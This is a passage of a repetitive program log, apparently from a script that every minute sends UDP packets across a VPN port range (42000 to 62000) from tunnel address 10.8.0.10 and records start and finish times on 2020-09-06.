+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:48:04 +Starting port fill at 2020-09-06 07:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:49:06 +Starting port fill at 2020-09-06 07:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:50:06 +Starting port fill at 2020-09-06 07:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:51:06 +Starting port fill at 2020-09-06 07:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:52:05 +Starting port fill at 2020-09-06 07:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:53:06 +Starting port fill at 2020-09-06 07:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:54:07 +Starting port fill at 2020-09-06 07:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:55:06 +Starting port fill at 2020-09-06 07:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:56:05 +Starting port fill at 2020-09-06 07:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:57:05 +Starting port fill at 2020-09-06 07:58:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:58:05 +Starting port fill at 2020-09-06 07:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:59:06 +Starting port fill at 2020-09-06 08:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:00:06 +Starting port fill at 2020-09-06 08:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 08:01:06 +Starting port fill at 2020-09-06 08:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:02:05 +Starting port fill at 2020-09-06 08:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:03:04 +Starting port fill at 2020-09-06 08:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:04:04 +Starting port fill at 2020-09-06 08:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:05:04 +Starting port fill at 2020-09-06 08:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:06:04 +Starting port fill at 2020-09-06 08:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:07:06 +Starting port fill at 2020-09-06 08:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:08:04 +Starting port fill at 2020-09-06 08:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:09:06 +Starting port fill at 2020-09-06 08:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 08:10:06 +Starting port fill at 2020-09-06 08:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 